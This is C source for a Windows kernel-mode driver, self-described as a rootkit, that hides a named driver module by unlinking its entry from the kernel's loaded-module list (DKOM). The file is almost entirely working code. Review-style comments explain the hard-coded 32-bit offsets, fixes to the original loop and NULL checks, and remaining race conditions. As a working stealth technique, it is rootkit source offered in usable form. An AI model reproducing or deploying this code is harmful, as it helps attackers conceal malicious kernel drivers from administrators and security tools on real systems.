/*
 * dkom.c - hides a loaded driver module by unlinking its entry from the
 * kernel's loaded-module list (DKOM). The name of the module to hide is
 * given by the HIDEDRIVER macro.
 * ineverland@163.com
 */
#include "ntddk.h"
#include "stdlib.h"
#include "stdio.h"
#include "windef.h"
/* Name of the driver *module* to unlink (not a process name). It is compared
 * case-sensitively against each list entry's driver_Name in DriverEntry. */
#define HIDEDRIVER "__ROOTKITDRIVER"
/*
 * Partial mirror of a loaded-module list entry as this driver expects it.
 * Only the leading fields are declared; the real kernel structure continues
 * past the "//..." marker. Layout is what matters: le_mod must be the first
 * member because DriverEntry casts LIST_ENTRY Flink pointers straight to
 * PMODULE_ENTRY, and driver_Path/driver_Name must sit at the offsets the
 * running kernel uses.
 *
 * NOTE(review): the field widths (DWORD, four unknown DWORDs) only fit a
 * 32-bit kernel and the offsets are version-specific. Presumably this is
 * meant to match the kernel's loader data table entry for the build the
 * author targeted - confirm against that build before relying on it.
 */
typedef struct _MODULE_ENTRY {
LIST_ENTRY le_mod;           /* links into the circular module list */
DWORD unknown[4];            /* filler up to the fields used below; meaning not known here */
DWORD base;                  /* not read by this file */
DWORD driver_start;          /* not read by this file */
DWORD unk1;                  /* DriverEntry skips entries where this is 0 */
UNICODE_STRING driver_Path;  /* DriverEntry skips entries whose Length is 0 */
UNICODE_STRING driver_Name;  /* compared against HIDEDRIVER */
//...
} MODULE_ENTRY, *PMODULE_ENTRY;
/*
 * Driver unload callback, registered by DriverEntry.
 *
 * pDriverObject - this driver's object; accepted but not used.
 *
 * Only emits a debug message. It does not re-link the module entry that
 * DriverEntry may have unlinked, so that entry stays detached from the list
 * when the driver goes away.
 */
VOID UnLoad(IN PDRIVER_OBJECT pDriverObject)
{
    (void)pDriverObject;
    DbgPrint("Unload\n");
}
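/*
 * Unused hook (the original marked it "not used" and nothing calls it).
 * The previous body only declared two locals and carried commented-out probes
 * of kernel entry points; all of that was dead code and has been removed, so
 * calling this function is a no-op.
 */
void Cheat()
{
}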
/*
 * Reads this driver's own loaded-module entry out of its driver object.
 *
 * DriverObject - the DRIVER_OBJECT handed to DriverEntry.
 *
 * Returns the entry pointer as a DWORD, or 0 when DriverObject is NULL or the
 * slot holds NULL. Despite the name, this is the entry for *this* module, not
 * the head of PsLoadedModuleList; DriverEntry uses it as the starting point
 * for walking the circular list.
 *
 * NOTE(review): 0x14 is a hard-coded, 32-bit-only offset into DRIVER_OBJECT;
 * presumably it is the DriverSection field, which would be safer to address
 * by name - confirm for the targeted build.
 */
DWORD FindPsLoadedModuleList (IN PDRIVER_OBJECT DriverObject)
{
    PMODULE_ENTRY *entry_slot;

    if (DriverObject == NULL)
        return 0;

    entry_slot = (PMODULE_ENTRY *)((DWORD)DriverObject + 0x14);
    /* A NULL entry converts to 0, which is the same "not found" result. */
    return (DWORD)*entry_slot;
}
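/*
 * Driver entry point. Walks the kernel's circular loaded-module list starting
 * at this driver's own entry and unlinks the first entry whose driver_Name
 * equals HIDEDRIVER, so that enumerations walking that list no longer see
 * the module (DKOM hiding).
 *
 * pDriverObject - this driver's DRIVER_OBJECT; used to find its module entry.
 * pRegistryPath - unused.
 *
 * Returns STATUS_SUCCESS on every path - including when the name conversion
 * fails, the module entry cannot be located, or no match is found - so the
 * driver stays loaded regardless of outcome.
 *
 * Changes from the original: the entry returned by FindPsLoadedModuleList is
 * checked for NULL before being dereferenced; the loop is a do/while so the
 * entry immediately preceding the starting point is compared too (the old
 * while-condition stopped one short of it); and the predecessor's Flink is
 * written through the LIST_ENTRY member instead of a PDWORD cast.
 *
 * NOTE(review): the list is modified without taking any lock; the kernel
 * keeps its own synchronization around this list, which is not acquired
 * here, so a concurrent module load/unload can race with the unlink. The
 * unlinked entry's own Flink/Blink are also left pointing at its former
 * neighbours and are never restored, and UnLoad does not re-link it, so
 * unloading the hidden driver afterwards is not safe.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath )
{
    UNICODE_STRING uni_drivername;
    ANSI_STRING drivername;
    PMODULE_ENTRY pm_current;
    PMODULE_ENTRY pm_driverlist;
    NTSTATUS ntStatus;

    (void)pRegistryPath;

    pDriverObject->DriverUnload = UnLoad;
    DbgPrint("the rootkit has been loaded!\n");

    /* Wrap the ANSI literal; Length excludes the terminator, as strlen does. */
    drivername.Length = (USHORT) strlen(HIDEDRIVER);
    drivername.MaximumLength = (USHORT) strlen(HIDEDRIVER);
    drivername.Buffer = (PCHAR)HIDEDRIVER;

    /* Starting point for the walk: this driver's own module entry. */
    pm_driverlist = (PMODULE_ENTRY)FindPsLoadedModuleList(pDriverObject);
    if (pm_driverlist == NULL)
    {
        /* FindPsLoadedModuleList returns 0 when it has nothing to offer;
         * the original dereferenced it unconditionally. */
        return STATUS_SUCCESS;
    }

    /* Allocates uni_drivername.Buffer; freed below on the success path only. */
    ntStatus = RtlAnsiStringToUnicodeString(&uni_drivername, &drivername, TRUE);
    if (!NT_SUCCESS(ntStatus))
    {
        /* Kept from the original: report success so the driver stays loaded. */
        return STATUS_SUCCESS;
    }

    pm_current = pm_driverlist;
    do
    {
        /* Skip entries that do not look populated - presumably this is how
         * the list head (a bare LIST_ENTRY, not a module entry) and any
         * half-initialised entries are avoided; confirm for the target build. */
        if ((pm_current->unk1 != 0x00000000) && (pm_current->driver_Path.Length != 0))
        {
            /* Third argument FALSE means the comparison is case-sensitive. */
            if (RtlCompareUnicodeString(&uni_drivername, &(pm_current->driver_Name), FALSE) == 0)
            {
                /* Splice the entry out: predecessor->Flink = successor,
                 * successor->Blink = predecessor. */
                pm_current->le_mod.Blink->Flink = pm_current->le_mod.Flink;
                pm_current->le_mod.Flink->Blink = pm_current->le_mod.Blink;
                DbgPrint("Just hid %s\n", drivername.Buffer);
                break;
            }
        }
        pm_current = (PMODULE_ENTRY)pm_current->le_mod.Flink;
    } while (pm_current != pm_driverlist);

    /* Conversion succeeded if we got here, so the buffer must be released. */
    RtlFreeUnicodeString(&uni_drivername);
    return STATUS_SUCCESS;
}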